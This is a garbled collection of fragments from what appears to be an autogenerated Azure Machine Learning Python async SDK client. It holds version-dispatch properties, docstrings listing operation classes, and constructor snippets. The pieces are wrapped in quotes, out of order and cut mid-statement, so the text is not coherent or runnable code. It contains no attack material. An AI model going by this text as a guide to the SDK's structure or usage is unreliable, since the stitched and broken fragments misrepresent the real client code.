api_version = self._get_api_version('code_containers') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import", "OperationClass elif api_version == '2021-10-01-dataplanepreview': from ..v2021_10_01_dataplanepreview.aio.operations import EnvironmentContainersOperations as OperationClass elif api_version", "as OperationClass elif api_version == '2022-02-01-preview': from ..v2022_02_01_preview.aio.operations import EnvironmentVersionsOperations as OperationClass elif", "the API version: * 2021-10-01: :class:`OnlineDeploymentsOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.OnlineDeploymentsOperations>` * 2022-02-01-preview: :class:`OnlineDeploymentsOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.OnlineDeploymentsOperations>` * 2022-05-01: :class:`OnlineDeploymentsOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.OnlineDeploymentsOperations>` \"\"\"", "* 2022-01-01-preview: :mod:`v2022_01_01_preview.models<azure.mgmt.machinelearningservices.v2022_01_01_preview.models>` * 2022-02-01-preview: :mod:`v2022_02_01_preview.models<azure.mgmt.machinelearningservices.v2022_02_01_preview.models>` * 2022-05-01: :mod:`v2022_05_01.models<azure.mgmt.machinelearningservices.v2022_05_01.models>` \"\"\" if api_version ==", "return models elif api_version == '2022-05-01': from ..v2022_05_01 import models return models raise", "self, credential: \"AsyncTokenCredential\", subscription_id: str, api_version: Optional[str] = None, base_url: str = \"https://management.azure.com\",", "data_call(self): \"\"\"Instance depends on the API version: * 1.5.0: :class:`DataCallOperations<azure.mgmt.machinelearningservices.dataset_dataplane.aio.operations.DataCallOperations>` \"\"\" api_version =", "def data_version(self): \"\"\"Instance depends on the API version: * 1.5.0: :class:`DataVersionOperations<azure.mgmt.machinelearningservices.dataset_dataplane.aio.operations.DataVersionOperations>` \"\"\" api_version", "'2022-05-01': from ..v2022_05_01.aio.operations import PrivateLinkResourcesOperations as OperationClass else: raise ValueError(\"API version {} does", "import PrivateEndpointConnectionsOperations as OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import PrivateEndpointConnectionsOperations as", "the API version: * v1.0: :class:`AsyncOperationsOperations<azure.mgmt.machinelearningservices.registry_discovery.aio.operations.AsyncOperationsOperations>` \"\"\" api_version = self._get_api_version('async_operations') if api_version ==", "\"\"\"Instance depends on the API version: * v1.0: :class:`MetricOperations<azure.mgmt.machinelearningservices.runhistory.aio.operations.MetricOperations>` \"\"\" api_version = self._get_api_version('metric')", "ValueError(\"API version {} does not have operation group 'batch_job_endpoint'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)),", "'batch_deployments'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def batch_endpoints(self): \"\"\"Instance depends on the", "* 2020-09-01-dataplanepreview: :mod:`v2020_09_01_dataplanepreview.models<azure.mgmt.machinelearningservices.v2020_09_01_dataplanepreview.models>` * 2021-10-01: :mod:`v2021_10_01.models<azure.mgmt.machinelearningservices.v2021_10_01.models>` * 2021-10-01-dataplanepreview: :mod:`v2021_10_01_dataplanepreview.models<azure.mgmt.machinelearningservices.v2021_10_01_dataplanepreview.models>` * 2022-01-01-preview: :mod:`v2022_01_01_preview.models<azure.mgmt.machinelearningservices.v2022_01_01_preview.models>` *", "import Operations as OperationClass else: raise ValueError(\"API version {} does not have operation", "the API version: * 2020-09-01-dataplanepreview: :class:`BatchJobEndpointOperations<azure.mgmt.machinelearningservices.v2020_09_01_dataplanepreview.aio.operations.BatchJobEndpointOperations>` \"\"\" api_version = self._get_api_version('batch_job_endpoint') if api_version ==", "version: * 2021-10-01: :class:`OnlineEndpointsOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.OnlineEndpointsOperations>` * 2022-02-01-preview: :class:`OnlineEndpointsOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.OnlineEndpointsOperations>` * 2022-05-01: :class:`OnlineEndpointsOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.OnlineEndpointsOperations>` \"\"\" api_version =", "CodeVersionsOperations as OperationClass elif api_version == '2022-02-01-preview': from ..v2022_02_01_preview.aio.operations import CodeVersionsOperations as OperationClass", "'private_endpoint_connections'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def private_link_resources(self): \"\"\"Instance depends on the", "= self._get_api_version('virtual_machine_sizes') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import VirtualMachineSizesOperations as OperationClass elif", "extensive_model(self): \"\"\"Instance depends on the API version: * 1.0.0: :class:`ExtensiveModelOperations<azure.mgmt.machinelearningservices.model_dataplane.aio.operations.ExtensiveModelOperations>` \"\"\" api_version =", "= self._get_api_version('data_versions') if api_version == '2022-02-01-preview': from ..v2022_02_01_preview.aio.operations import DataVersionsOperations as OperationClass elif", "2022-05-01: :mod:`v2022_05_01.models<azure.mgmt.machinelearningservices.v2022_05_01.models>` \"\"\" if api_version == '1.5.0': from ..dataset_dataplane import models return models", "2022-05-01: :class:`OnlineEndpointsOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.OnlineEndpointsOperations>` \"\"\" api_version = self._get_api_version('online_endpoints') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import", "from ._configuration import AzureMachineLearningWorkspacesConfiguration if TYPE_CHECKING: # pylint: disable=unused-import,ungrouped-imports from azure.core.credentials import TokenCredential", "group and its API version. The api-version parameter sets the default API version", "'2022-05-01': from ..v2022_05_01.aio.operations import DatastoresOperations as OperationClass else: raise ValueError(\"API version {} does", "have operation group 'private_link_resources'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def quotas(self): \"\"\"Instance", "from ..runhistory.aio.operations import SpansOperations as OperationClass else: raise ValueError(\"API version {} does not", "'2022-05-01': from ..v2022_05_01.aio.operations import OnlineEndpointsOperations as OperationClass else: raise ValueError(\"API version {} does", "{} does not have operation group 'models'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property", "from ..v2021_10_01.aio.operations import WorkspaceConnectionsOperations as OperationClass elif api_version == '2022-01-01-preview': from ..v2022_01_01_preview.aio.operations import", "return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def quotas(self): \"\"\"Instance depends on the API", "profile: azure.profiles.KnownProfiles :keyword int polling_interval: Default waiting time between two polls for LRO", "as OperationClass else: raise ValueError(\"API version {} does not have operation group 'spans'\".format(api_version))", "final version of multiapi azure-core based client \"\"\" pass class AzureMachineLearningWorkspaces(MultiApiClientMixin, _SDKClient): \"\"\"These", "not have operation group 'code_containers'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def code_versions(self):", "ValueError(\"API version {} does not have operation group 'batch_endpoints'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)),", ":class:`ModelContainersOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.ModelContainersOperations>` \"\"\" api_version = self._get_api_version('model_containers') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import ModelContainersOperations", "* 2021-10-01-dataplanepreview: :class:`CodeVersionsOperations<azure.mgmt.machinelearningservices.v2021_10_01_dataplanepreview.aio.operations.CodeVersionsOperations>` * 2022-02-01-preview: :class:`CodeVersionsOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.CodeVersionsOperations>` * 2022-05-01: :class:`CodeVersionsOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.CodeVersionsOperations>` \"\"\" api_version = self._get_api_version('code_versions')", "* 2022-05-01: :class:`ComponentContainersOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.ComponentContainersOperations>` \"\"\" api_version = self._get_api_version('component_containers') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations", "subscription. :type subscription_id: str :param api_version: API version to use if no profile", "2021-10-01: :class:`VirtualMachineSizesOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.VirtualMachineSizesOperations>` * 2022-01-01-preview: :class:`VirtualMachineSizesOperations<azure.mgmt.machinelearningservices.v2022_01_01_preview.aio.operations.VirtualMachineSizesOperations>` * 2022-05-01: :class:`VirtualMachineSizesOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.VirtualMachineSizesOperations>` \"\"\" api_version = self._get_api_version('virtual_machine_sizes') if", "OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def datasets_v1(self): \"\"\"Instance depends on the API version:", "information. # # Code generated by Microsoft (R) AutoRest Code Generator. # Changes", "return models elif api_version == 'v1.0': from ..registry_discovery import models return models elif", "on the API version: * 2021-10-01: :class:`ModelContainersOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.ModelContainersOperations>` * 2021-10-01-dataplanepreview: :class:`ModelContainersOperations<azure.mgmt.machinelearningservices.v2021_10_01_dataplanepreview.aio.operations.ModelContainersOperations>` * 2022-02-01-preview: :class:`ModelContainersOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.ModelContainersOperations>`", "online_endpoints(self): \"\"\"Instance depends on the API version: * 2021-10-01: :class:`OnlineEndpointsOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.OnlineEndpointsOperations>` * 2022-02-01-preview: :class:`OnlineEndpointsOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.OnlineEndpointsOperations>`", "multiapi azure-core based client \"\"\" pass class AzureMachineLearningWorkspaces(MultiApiClientMixin, _SDKClient): \"\"\"These APIs allow end", "api_version == '2021-10-01': from ..v2021_10_01.aio.operations import BatchEndpointsOperations as OperationClass elif api_version == '2022-02-01-preview':", "depends on the API version: * 1.5.0: :class:`DeleteOperations<azure.mgmt.machinelearningservices.dataset_dataplane.aio.operations.DeleteOperations>` * v1.0: :class:`DeleteOperations<azure.mgmt.machinelearningservices.runhistory.aio.operations.DeleteOperations>` \"\"\" api_version", "def data_call(self): \"\"\"Instance depends on the API version: * 1.5.0: :class:`DataCallOperations<azure.mgmt.machinelearningservices.dataset_dataplane.aio.operations.DataCallOperations>` \"\"\" api_version", "2022-05-01: :class:`ComputeOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.ComputeOperations>` \"\"\" api_version = self._get_api_version('compute') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import", "else: raise ValueError(\"API version {} does not have operation group 'registry_management_non_workspace'\".format(api_version)) return OperationClass(self._client,", "version {} does not have operation group 'compute'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version)))", "if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import Operations as OperationClass elif api_version ==", "import BatchJobDeploymentOperations as OperationClass else: raise ValueError(\"API version {} does not have operation", "OperationClass elif api_version == '2022-02-01-preview': from ..v2022_02_01_preview.aio.operations import OnlineEndpointsOperations as OperationClass elif api_version", "'1.5.0': from ..dataset_dataplane.aio.operations import DataVersionOperations as OperationClass else: raise ValueError(\"API version {} does", "..v2021_10_01_dataplanepreview.aio.operations import ModelContainersOperations as OperationClass elif api_version == '2022-02-01-preview': from ..v2022_02_01_preview.aio.operations import ModelContainersOperations", "import DataContainersOperations as OperationClass else: raise ValueError(\"API version {} does not have operation", "is a fake class to support current implemetation of MultiApiClientMixin.\" Will be removed", "does not have operation group 'usages'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def", "from ..v2022_05_01.aio.operations import DatastoresOperations as OperationClass else: raise ValueError(\"API version {} does not", "on the API version: * 1.5.0: :class:`DataContainerOperations<azure.mgmt.machinelearningservices.dataset_dataplane.aio.operations.DataContainerOperations>` \"\"\" api_version = self._get_api_version('data_container') if api_version", ":class:`CodeVersionsOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.CodeVersionsOperations>` \"\"\" api_version = self._get_api_version('code_versions') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import CodeVersionsOperations", ":class:`WorkspaceConnectionsOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.WorkspaceConnectionsOperations>` \"\"\" api_version = self._get_api_version('workspace_connections') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import WorkspaceConnectionsOperations", "as OperationClass elif api_version == '2022-02-01-preview': from ..v2022_02_01_preview.aio.operations import ComponentContainersOperations as OperationClass elif", "**kwargs) super(AzureMachineLearningWorkspaces, self).__init__( api_version=api_version, profile=profile ) @classmethod def _models_dict(cls, api_version): return {k: v", "group 'batch_endpoints'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def batch_job_deployment(self): \"\"\"Instance depends on", "import OnlineEndpointsOperations as OperationClass elif api_version == '2022-02-01-preview': from ..v2022_02_01_preview.aio.operations import OnlineEndpointsOperations as", ":class:`PrivateLinkResourcesOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.PrivateLinkResourcesOperations>` \"\"\" api_version = self._get_api_version('private_link_resources') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import PrivateLinkResourcesOperations", "= self._get_api_version('private_endpoint_connections') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import PrivateEndpointConnectionsOperations as OperationClass elif", "BatchJobEndpointOperations as OperationClass else: raise ValueError(\"API version {} does not have operation group", "* 2021-10-01: :mod:`v2021_10_01.models<azure.mgmt.machinelearningservices.v2021_10_01.models>` * 2021-10-01-dataplanepreview: :mod:`v2021_10_01_dataplanepreview.models<azure.mgmt.machinelearningservices.v2021_10_01_dataplanepreview.models>` * 2022-01-01-preview: :mod:`v2022_01_01_preview.models<azure.mgmt.machinelearningservices.v2022_01_01_preview.models>` * 2022-02-01-preview: :mod:`v2022_02_01_preview.models<azure.mgmt.machinelearningservices.v2022_02_01_preview.models>` *", "api_version == '2022-05-01': from ..v2022_05_01.aio.operations import ComponentContainersOperations as OperationClass else: raise ValueError(\"API version", "2022-05-01: :class:`VirtualMachineSizesOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.VirtualMachineSizesOperations>` \"\"\" api_version = self._get_api_version('virtual_machine_sizes') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import", "Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) async def close(self): await self._client.close() async def __aenter__(self): await self._client.__aenter__() return", "..v2022_01_01_preview.aio.operations import WorkspacesOperations as OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import WorkspacesOperations", "operation group 'datastores'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def delete(self): \"\"\"Instance depends", "from azure.core.credentials import TokenCredential from azure.core.credentials_async import AsyncTokenCredential class _SDKClient(object): def __init__(self, *args,", "profile sets a mapping between an operation group and its API version. The", "self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def dataset_controller_v2(self): \"\"\"Instance depends on the API version: *", "API version: * 1.0.0: :class:`ModelsOperations<azure.mgmt.machinelearningservices.model_dataplane.aio.operations.ModelsOperations>` \"\"\" api_version = self._get_api_version('models') if api_version == '1.0.0':", "* 2022-05-01: :class:`DatastoresOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.DatastoresOperations>` \"\"\" api_version = self._get_api_version('datastores') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations", "API version: * v1.0: :class:`RunOperations<azure.mgmt.machinelearningservices.runhistory.aio.operations.RunOperations>` \"\"\" api_version = self._get_api_version('run') if api_version == 'v1.0':", "elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import OnlineDeploymentsOperations as OperationClass else: raise ValueError(\"API", "on the API version: * 2021-10-01: :class:`WorkspacesOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.WorkspacesOperations>` * 2022-01-01-preview: :class:`WorkspacesOperations<azure.mgmt.machinelearningservices.v2022_01_01_preview.aio.operations.WorkspacesOperations>` * 2022-05-01: :class:`WorkspacesOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.WorkspacesOperations>`", "2022-05-01: :class:`WorkspaceFeaturesOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.WorkspaceFeaturesOperations>` \"\"\" api_version = self._get_api_version('workspace_features') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import", "the Azure clouds (Azure Stack, Azure Government, Azure China, etc.). By default, it", "as OperationClass elif api_version == '2022-01-01-preview': from ..v2022_01_01_preview.aio.operations import WorkspacesOperations as OperationClass elif", "depends on the API version: * 1.5.0: :class:`DataVersionOperations<azure.mgmt.machinelearningservices.dataset_dataplane.aio.operations.DataVersionOperations>` \"\"\" api_version = self._get_api_version('data_version') if", "else: raise ValueError(\"API version {} does not have operation group 'dataset_v2'\".format(api_version)) return OperationClass(self._client,", "\"\"\"Instance depends on the API version: * 2021-10-01: :class:`ComponentVersionsOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.ComponentVersionsOperations>` * 2021-10-01-dataplanepreview: :class:`ComponentVersionsOperations<azure.mgmt.machinelearningservices.v2021_10_01_dataplanepreview.aio.operations.ComponentVersionsOperations>` *", "'2022-02-01-preview': from ..v2022_02_01_preview.aio.operations import EnvironmentVersionsOperations as OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations", "raise ValueError(\"API version {} does not have operation group 'datasets_v1'\".format(api_version)) return OperationClass(self._client, self._config,", "'dataset_containers': '2021-10-01', 'dataset_controller_v2': '1.5.0', 'dataset_v2': '1.5.0', 'dataset_versions': '2021-10-01', 'datasets_v1': '1.5.0', 'delete': 'v1.0', 'events':", "* 1.5.0: :class:`DataVersionOperations<azure.mgmt.machinelearningservices.dataset_dataplane.aio.operations.DataVersionOperations>` \"\"\" api_version = self._get_api_version('data_version') if api_version == '1.5.0': from ..dataset_dataplane.aio.operations", "experiments(self): \"\"\"Instance depends on the API version: * v1.0: :class:`ExperimentsOperations<azure.mgmt.machinelearningservices.runhistory.aio.operations.ExperimentsOperations>` \"\"\" api_version =", "else: raise ValueError(\"API version {} does not have operation group 'online_deployments'\".format(api_version)) return OperationClass(self._client,", "as OperationClass else: raise ValueError(\"API version {} does not have operation group 'registry_management_non_workspace'\".format(api_version))", "depends on the API version: * 1.0.0: :class:`ModelsOperations<azure.mgmt.machinelearningservices.model_dataplane.aio.operations.ModelsOperations>` \"\"\" api_version = self._get_api_version('models') if", "import WorkspaceConnectionsOperations as OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import WorkspaceConnectionsOperations as", "self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def component_containers(self): \"\"\"Instance depends on the API version: *", "OnlineEndpointsOperations as OperationClass else: raise ValueError(\"API version {} does not have operation group", "if api_version == 'v1.0': from ..registry_discovery.aio.operations import RegistryManagementNonWorkspaceOperations as OperationClass else: raise ValueError(\"API", "disable=unused-import,ungrouped-imports from azure.core.credentials import TokenCredential from azure.core.credentials_async import AsyncTokenCredential class _SDKClient(object): def __init__(self,", "as OperationClass elif api_version == 'v1.0': from ..runhistory.aio.operations import DeleteOperations as OperationClass else:", "as OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import UsagesOperations as OperationClass else:", "elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import VirtualMachineSizesOperations as OperationClass else: raise ValueError(\"API", "* 2022-05-01: :class:`PrivateEndpointConnectionsOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.PrivateEndpointConnectionsOperations>` \"\"\" api_version = self._get_api_version('private_endpoint_connections') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations", "API version: * 2021-10-01: :class:`Operations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.Operations>` * 2022-01-01-preview: :class:`Operations<azure.mgmt.machinelearningservices.v2022_01_01_preview.aio.operations.Operations>` * 2022-05-01: :class:`Operations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.Operations>` \"\"\" api_version", "else: raise ValueError(\"API version {} does not have operation group 'async_operations'\".format(api_version)) return OperationClass(self._client,", "the API version: * 1.5.0: :class:`DataVersionOperations<azure.mgmt.machinelearningservices.dataset_dataplane.aio.operations.DataVersionOperations>` \"\"\" api_version = self._get_api_version('data_version') if api_version ==", "API version: * 2021-10-01: :class:`ModelContainersOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.ModelContainersOperations>` * 2021-10-01-dataplanepreview: :class:`ModelContainersOperations<azure.mgmt.machinelearningservices.v2021_10_01_dataplanepreview.aio.operations.ModelContainersOperations>` * 2022-02-01-preview: :class:`ModelContainersOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.ModelContainersOperations>` * 2022-05-01:", ":class:`QuotasOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.QuotasOperations>` \"\"\" api_version = self._get_api_version('quotas') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import QuotasOperations", "group 'private_link_resources'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def quotas(self): \"\"\"Instance depends on", "\"AsyncTokenCredential\", subscription_id: str, api_version: Optional[str] = None, base_url: str = \"https://management.azure.com\", profile: KnownProfiles", "does not have operation group 'workspace_connections'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def", "on the API version: * 2021-10-01: :class:`VirtualMachineSizesOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.VirtualMachineSizesOperations>` * 2022-01-01-preview: :class:`VirtualMachineSizesOperations<azure.mgmt.machinelearningservices.v2022_01_01_preview.aio.operations.VirtualMachineSizesOperations>` * 2022-05-01: :class:`VirtualMachineSizesOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.VirtualMachineSizesOperations>`", "== '2022-05-01': from ..v2022_05_01.aio.operations import OnlineEndpointsOperations as OperationClass else: raise ValueError(\"API version {}", "OperationClass else: raise ValueError(\"API version {} does not have operation group 'batch_job_endpoint'\".format(api_version)) return", "return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def temporary_data_references(self): \"\"\"Instance depends on the API", "* 2021-10-01: :class:`ComponentContainersOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.ComponentContainersOperations>` * 2021-10-01-dataplanepreview: :class:`ComponentContainersOperations<azure.mgmt.machinelearningservices.v2021_10_01_dataplanepreview.aio.operations.ComponentContainersOperations>` * 2022-02-01-preview: :class:`ComponentContainersOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.ComponentContainersOperations>` * 2022-05-01: :class:`ComponentContainersOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.ComponentContainersOperations>` \"\"\"", "EventsOperations as OperationClass else: raise ValueError(\"API version {} does not have operation group", "'dataset_versions'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def datasets_v1(self): \"\"\"Instance depends on the", "api_version = self._get_api_version('run') if api_version == 'v1.0': from ..runhistory.aio.operations import RunOperations as OperationClass", "'2021-10-01', 'datasets_v1': '1.5.0', 'delete': 'v1.0', 'events': 'v1.0', 'experiments': 'v1.0', 'extensive_model': '1.0.0', 'get_operation_status': '1.5.0',", "versions, to help you deal with all of the Azure clouds (Azure Stack,", "api_version == '2022-02-01-preview': from ..v2022_02_01_preview.aio.operations import ComponentContainersOperations as OperationClass elif api_version == '2022-05-01':", "self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def jobs(self): \"\"\"Instance depends on the API version: *", "* 2022-02-01-preview: :class:`ComponentContainersOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.ComponentContainersOperations>` * 2022-05-01: :class:`ComponentContainersOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.ComponentContainersOperations>` \"\"\" api_version = self._get_api_version('component_containers') if api_version ==", "version {} does not have operation group 'component_containers'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version)))", "self._get_api_version('datastores') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import DatastoresOperations as OperationClass elif api_version", "Azure China, etc.). By default, it uses the latest API version available on", "end users to operate on Azure Machine Learning Workspace resources. This ready contains", "\"\"\" api_version = self._get_api_version('batch_job_endpoint') if api_version == '2020-09-01-dataplanepreview': from ..v2020_09_01_dataplanepreview.aio.operations import BatchJobEndpointOperations as", "..v2022_05_01.aio.operations import PrivateLinkResourcesOperations as OperationClass else: raise ValueError(\"API version {} does not have", "== '2021-10-01': from ..v2021_10_01.aio.operations import WorkspaceConnectionsOperations as OperationClass elif api_version == '2022-01-01-preview': from", "== '1.0.0': from ..model_dataplane.aio.operations import ModelsOperations as OperationClass else: raise ValueError(\"API version {}", "data_containers(self): \"\"\"Instance depends on the API version: * 2022-02-01-preview: :class:`DataContainersOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.DataContainersOperations>` * 2022-05-01: :class:`DataContainersOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.DataContainersOperations>`", "if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import OnlineDeploymentsOperations as OperationClass elif api_version ==", "import DatasetControllerV2Operations as OperationClass else: raise ValueError(\"API version {} does not have operation", "group 'async_operations'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def batch_deployments(self): \"\"\"Instance depends on", "..v2021_10_01.aio.operations import DatasetVersionsOperations as OperationClass else: raise ValueError(\"API version {} does not have", "..v2022_01_01_preview.aio.operations import QuotasOperations as OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import QuotasOperations", "Optional[str] = None, base_url: str = \"https://management.azure.com\", profile: KnownProfiles = KnownProfiles.default, **kwargs #", "OperationClass elif api_version == '2022-01-01-preview': from ..v2022_01_01_preview.aio.operations import PrivateEndpointConnectionsOperations as OperationClass elif api_version", "coding=utf-8 # -------------------------------------------------------------------------- # Copyright (c) Microsoft Corporation. All rights reserved. # Licensed", "self._get_api_version('private_link_resources') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import PrivateLinkResourcesOperations as OperationClass elif api_version", "import DataCallOperations as OperationClass else: raise ValueError(\"API version {} does not have operation", "missing in profile. :type api_version: str :param base_url: Service URL :type base_url: str", "'2021-10-01-dataplanepreview': from ..v2021_10_01_dataplanepreview import models return models elif api_version == '2022-01-01-preview': from ..v2022_01_01_preview", "from ..v2022_02_01_preview.aio.operations import DataContainersOperations as OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import", "ValueError(\"API version {} does not have operation group 'model_versions'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)),", "= self._get_api_version('workspace_features') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import WorkspaceFeaturesOperations as OperationClass elif", "'model_containers'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def model_versions(self): \"\"\"Instance depends on the", "= self._get_api_version('runs') if api_version == 'v1.0': from ..runhistory.aio.operations import RunsOperations as OperationClass else:", "'v1.0', 'spans': 'v1.0', 'temporary_data_references': '2021-10-01-dataplanepreview', }}, _PROFILE_TAG + \" latest\" ) def __init__(", "Deserializer(self._models_dict(api_version))) @property def batch_job_endpoint(self): \"\"\"Instance depends on the API version: * 2020-09-01-dataplanepreview: :class:`BatchJobEndpointOperations<azure.mgmt.machinelearningservices.v2020_09_01_dataplanepreview.aio.operations.BatchJobEndpointOperations>`", "OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import BatchEndpointsOperations as OperationClass else: raise", "== '2022-01-01-preview': from ..v2022_01_01_preview import models return models elif api_version == '2022-02-01-preview': from", "version of multiapi azure-core based client \"\"\" pass class AzureMachineLearningWorkspaces(MultiApiClientMixin, _SDKClient): \"\"\"These APIs", ":class:`DataContainersOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.DataContainersOperations>` * 2022-05-01: :class:`DataContainersOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.DataContainersOperations>` \"\"\" api_version = self._get_api_version('data_containers') if api_version == '2022-02-01-preview': from", "OperationClass else: raise ValueError(\"API version {} does not have operation group 'datasets_v1'\".format(api_version)) return", "2022-02-01-preview: :class:`CodeVersionsOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.CodeVersionsOperations>` * 2022-05-01: :class:`CodeVersionsOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.CodeVersionsOperations>` \"\"\" api_version = self._get_api_version('code_versions') if api_version == '2021-10-01':", "'data_version'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def data_versions(self): \"\"\"Instance depends on the", "the API version: * 2021-10-01: :class:`DatastoresOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.DatastoresOperations>` * 2022-02-01-preview: :class:`DatastoresOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.DatastoresOperations>` * 2022-05-01: :class:`DatastoresOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.DatastoresOperations>` \"\"\"", "Service URL :type 